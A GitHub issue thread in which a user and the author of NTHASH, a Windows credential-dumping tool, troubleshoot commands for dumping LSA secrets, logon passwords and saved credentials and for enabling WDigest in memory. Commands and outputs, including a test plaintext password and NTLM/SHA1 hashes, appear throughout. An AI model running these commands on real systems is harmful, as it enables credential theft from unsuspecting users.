search

erwan2212 / NTHASH-FPC

33 stars 8 forks source link

Some commands not working #5

Closed Papotito123 closed 4 years ago

Papotito123 commented 4 years ago

Hello; Not sweat.Just something for when have time.

I copied running OS , SAM / SYSTEM / SECURITY , and save as *.sav.

Then run: 1. NTHASH-win64.exe /dumpsecret /input:dpapi_system /offline NTHASH 1.8 x64 by erwan2212@gmail.com Offline=true dumpsecret NOT OK, try adding /system dumpsecret NOT OK, try adding /system

NTHASH-win64.exe /dumpsecret /input:defaultpassword /system NTHASH 1.8 x64 by erwan2212@gmail.com Impersonate:SYSTEM dumpsecret NOT OK, try adding /system dumpsecret NOT OK, try adding /system

NTHASH-win64.exe /dumpsecret /input:defaultpassword NTHASH 1.8 x64 by erwan2212@gmail.com dumpsecret NOT OK, try adding /system dumpsecret NOT OK, try adding /system

Maybe I don't know how to run ?

  1. About /wdigest , it runs well (I have it enabled). So I disabled via reg and then do logout/logon.

Then runn /wdigeston: NTHASH-win64.exe /wdigeston NTHASH 1.8 x64 by erwan2212@gmail.com no patch mod for this windows version wdigest_on NOT OK

Papotito123 commented 4 years ago

Hello: Ok.I found dbghelp.dll and symsrv.dll in Comae-Toolkit-master tool recently downloaded. I copied to NTHASH folder.

So I have to run : C:\NTHASH>NTHASH-win64.exe /logonpasswords /symbol NTHASH 1.8 x64 by erwan2212@gmail.com

LUID:003FBCD2 username:TESTACCOUNT domain:DESKTOP-2GHHNFK ->CredentialManager:0140A9B0 -CREDENTIALW:01454670 UserName:testuser TargetName:Domain:target=DESKTOP-WINVIRT Password:@ccountf0rtesT CREDENTIALS.AuthID:00000003 ->Primary == and so on ===

And for /wdigeston ,yeah. For /wdigeston I have to logout /login to grab plain-text password.

Testing some other .....

NTHASH-win64.exe /dpapimk /symbol >> good

C:\NTHASH>NTHASH-win64.exe /enumcred2 NTHASH 1.8 x64 by erwan2212@gmail.com 2

Flags:0 Type:1 TargetName:Yandex.Browser UserName:myemail@hotmail.com CredentialBlob tvz????&X???c?,oOA??? ???? << no decryption method still for new Yandex

Flags:0 Type_:2 TargetName:DESKTOP-WINVIRT Comment:SspiPfc UserName:testuser CredentialBlob:x x x x x x x x x <<== login password for a VBOX VM Win 10 1809

erwan2212 commented 4 years ago

NTHASH-win64.exe /dumpsecret

Hello; Not sweat.Just something for when have time.

I copied running OS , SAM / SYSTEM / SECURITY , and save as *.sav.

Then run: 1. NTHASH-win64.exe /dumpsecret /input:dpapi_system /offline NTHASH 1.8 x64 by erwan2212@gmail.com Offline=true dumpsecret NOT OK, try adding /system dumpsecret NOT OK, try adding /system

NTHASH-win64.exe /dumpsecret /input:defaultpassword /system NTHASH 1.8 x64 by erwan2212@gmail.com Impersonate:SYSTEM dumpsecret NOT OK, try adding /system dumpsecret NOT OK, try adding /system

NTHASH-win64.exe /dumpsecret /input:defaultpassword NTHASH 1.8 x64 by erwan2212@gmail.com dumpsecret NOT OK, try adding /system dumpsecret NOT OK, try adding /system

Maybe I don't know how to run ?

About NTHASH-win64.exe /dumpsecret, note it is the same as /getlsasecret. With some differences thus : dumpsecret can work offline (against a security.sav and system.sav) or online (against the loaded security registry hive) using /system.

With latest version (just uploaded), you can do /dumpsecret /input:* /system (or /offline). It will list all possible secrets. Spot one (like defaultpassword or dpapi_system) then run /dumpsecret /input:my_selected_secret /system.

Post the output using /verbose.

erwan2212 commented 4 years ago

About /wdigest , it runs well (I have it enabled). So I disabled via reg and then do logout/logon.

Then runn /wdigeston: NTHASH-win64.exe /wdigeston NTHASH 1.8 x64 by erwan2212@gmail.com no patch mod for this windows version wdigest_on NOT OK

You can find the dbghelp dll's in dbghelpX64.zip on my github. Unzip dll's in current nthash folder if you want to use /symbol. With /wdigeston, you do not need to modify the registry nor reboot - just wait until somebody logs on again. The change is only in memory and volatile as opposed to a change in registry.

Papotito123 commented 4 years ago

Hello; Here's the output.

Papotito123_git 13c1dee_dumpsecret verbose.txt

Thanks.

erwan2212 commented 4 years ago

Hello; Here's the output.

Papotito123_git 13c1dee_dumpsecret verbose.txt

Thanks.

I took a look at your logs. It looks rather good.

dumpsecret will try the currval and oldval key for a secret so dont worry if one or the other does not get retrieved.

Thus, the defaultpassword does not seem to work for you. DefaultPassword is NOT the same as User Auto-logon password. This key is used to store your password the first time you set it (during windows installation). Most of the time this is obsolete unless the user never changed it.

It also not to be confused with TBAL or the old AutoAdminLogon. I would like to work on TBAL but so far cant seem to turn it on my windows 10 :(

About dumpsecret, note that you can also try (online only then) try getlsasecret (will read only the current value/secret as opposed to dumpsecret who will read current value and old value).

I have uploaded a new binary who gives a bit more meaningfull messages while performing some extra checks here and there.

Papotito123 commented 4 years ago

Hello:. Thanks for the explanation. So I dont have to worry about /dumpsecret . DefaultPassword is not an option offered in every user account.

The tool is playing good.

I still not downloaded the latest version you mention,but the page still shows git 13c1dee. No worries.

Thanks.

erwan2212 commented 4 years ago

About TBAL, i read the excellent https://vztekoverflow.com/2018/07/31/tbal-dpapi-backdoor/. Then downloaded https://vztekoverflow.com/files/tbal/1803.zip and reviewed my code and fixed some bugs.

TBAL if exists is now handled fine.

NTHASH-win64.exe /dumpsecret /input:M$_MSV1_0_TBALPRIMARY{22BE8E5B-58B3-4A87-BA71-41B0ECF3A9EA} /offline NTHASH 1.8 x64 by erwan2212@gmail.com Offline=true CurrVal ntlm:632E627CDA1006E91D12954EB09848AE sha1:C5B1E5291BDD6BBED2A064580944D79ABCC08B41 dumpsecret NOT OK for M$_MSV1_0_TBALPRIMARY{22BE8E5B-58B3-4A87-BA71-41B0ECF3A9 EA}\OldVal

Another way to retrieve the user sha1 password, thus unlocking many secrets.

Papotito123 commented 4 years ago

Hello: Cool. This article is a reference.That's why I paid attention when mimikatz starts to throws _TBAL(also lazagne).And I found this reading.

This TBAL hash is been from Win 8.1 but after Win10 17xx is something common. It's just end-user didn't see it. But even if password is showing as _TBAL the NTLM/SHA1 hashes are the real ones

I didn't test the "latest-now-old" git. But I will do it with the new one.

Thanks.

Papotito123 commented 4 years ago

Hello: Just tested latest git with /dumpsecret. Runs well. But unfortunately I can't test _TBAL option because this happens once in a while(none in last 2 months). And from my perspective, I think most times is triggered when doing too much mimikatz commands so Defender got in panic. I tell you that one day my computer boots and I got TBAL.I kept doing mimi and others.After 2 hours I Shutdown computer and then wdigest plain-text password was grabbed.Other time I have TBAL and plain-text password been switching for 3 times while logged without Restarting. Like a crazy thing.

erwan2212 commented 4 years ago

/dumpsecret works fine